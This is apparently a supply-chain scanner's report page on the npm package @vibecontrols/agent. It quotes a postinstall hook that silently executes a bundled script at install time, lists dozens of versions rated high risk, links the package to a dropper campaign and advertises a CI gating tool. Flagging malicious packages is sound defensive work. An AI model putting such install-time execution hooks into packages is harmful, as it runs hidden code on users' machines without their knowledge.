PkgRadar

npm · registry.npmjs.org

@vibecontrols/agent

Install Lifecycle Remote Or Exec: postinstall="node -e \"try{require('node:fs').accessSync('./dist/postinstall-shim-fix.cjs');require('node:child_process').execFileSync(process.execPath,['./dist/postinstall-shim-fix.cjs'],{stdio:'inherit'})}catch(e){}\""

Why PkgRadar flagged 2026.608.1

SeveritySignalEvidence
highInstall Lifecycle Remote Or Execpostinstall="node -e \"try{require('node:fs').accessSync('./dist/postinstall-shim-fix.cjs');require('node:child_process').execFileSync(process.execPath,['./dist/postinstall-shim-fix.cjs'],{stdio:'inherit'})}catch(e){}\"" · package.json
mediumNew Account With Lifecycle Hookpackage first published 79 day(s) ago, 9 total version(s), has lifecycle hook · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
2026.608.1High risk352026-06-10
2026.602.5High risk352026-06-10
2026.602.6High risk172026-06-10
2026.602.7High risk172026-06-10
2026.602.4High risk172026-06-10
2026.602.3High risk352026-06-10
2026.602.2High risk172026-06-10
2026.602.1High risk172026-06-10
2026.601.30High risk172026-06-10
2026.601.28High risk172026-06-01
2026.601.29High risk352026-06-01
2026.601.26High risk352026-06-01
2026.601.27High risk172026-06-01
2026.601.23High risk172026-06-01
2026.601.22High risk352026-06-01
2026.601.21High risk242026-06-01
2026.601.20High risk242026-06-01
2026.601.13High risk242026-06-01
2026.601.12High risk242026-06-01
2026.601.11High risk242026-06-01
2026.601.10High risk242026-06-01
2026.601.9High risk242026-06-01
2026.601.8High risk242026-06-01
2026.601.7High risk242026-06-01
2026.601.6High risk242026-06-01
2026.601.5High risk242026-06-01
2026.601.4High risk242026-06-01
2026.601.3High risk242026-06-01
2026.601.2High risk242026-06-01
2026.601.1High risk242026-06-01
2026.531.20High risk242026-05-31
2026.531.19High risk242026-05-31
2026.531.17High risk242026-05-31
2026.531.18High risk242026-05-31
2026.531.15High risk242026-05-31
2026.531.16High risk242026-05-31
2026.531.14High risk242026-05-31
2026.531.13High risk242026-05-31
2026.531.12High risk242026-05-31
2026.531.11High risk242026-05-31
2026.531.10High risk242026-05-31
2026.531.9High risk242026-05-31
2026.531.8High risk242026-05-31
2026.531.7High risk242026-05-31
2026.531.6High risk242026-05-31
2026.531.5High risk242026-05-31
2026.531.4High risk242026-05-31
2026.531.3High risk242026-05-31
2026.531.2High risk242026-05-31
2026.531.1High risk242026-05-31
2026.530.18High risk242026-05-30
2026.530.16High risk242026-05-30
2026.530.17High risk242026-05-30
2026.530.15High risk242026-05-30
2026.530.14High risk242026-05-30
2026.530.13High risk242026-05-30
2026.530.12High risk242026-05-30
2026.530.11High risk242026-05-30
2026.530.10High risk242026-05-30
2026.530.9High risk242026-05-30
2026.530.8High risk242026-05-30
2026.530.7High risk242026-05-30
2026.530.6High risk352026-05-30
2026.530.5High risk352026-05-30
2026.530.4High risk242026-05-30
2026.530.2High risk242026-05-30
2026.530.3High risk352026-05-30
2026.530.1High risk352026-05-30
2026.529.13High risk352026-05-30
2026.529.9High risk242026-05-29
2026.529.10High risk242026-05-29
2026.529.7Review52026-05-29
2026.529.8Review52026-05-29
2026.529.5Review32026-05-29
2026.529.4Review52026-05-29
2026.529.3Review52026-05-29
2026.529.2Review32026-05-29
2026.529.1Review32026-05-29
2026.528.7Review52026-05-28
2026.528.8Review52026-05-28
2026.527.8Review112026-05-28
2026.527.6Review112026-05-27
2026.527.7Review112026-05-27
2026.527.1Review112026-05-27
2026.527.2Review112026-05-27
2026.526.2Review112026-05-26
2026.526.3Review112026-05-26
2026.526.1Review112026-05-26
2026.525.4Review172026-05-25
2026.525.3Review172026-05-25
2026.525.2Review172026-05-25
2026.525.1Review172026-05-25
2026.523.3Review172026-05-25
2026.524.1Review172026-05-25

Campaign attribution

Part of the Clob dropper campaign.

Block this in CI

PkgRadar gates @vibecontrols/agent (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm @vibecontrols/[email protected]
Start free — 25 scans / moView full evidence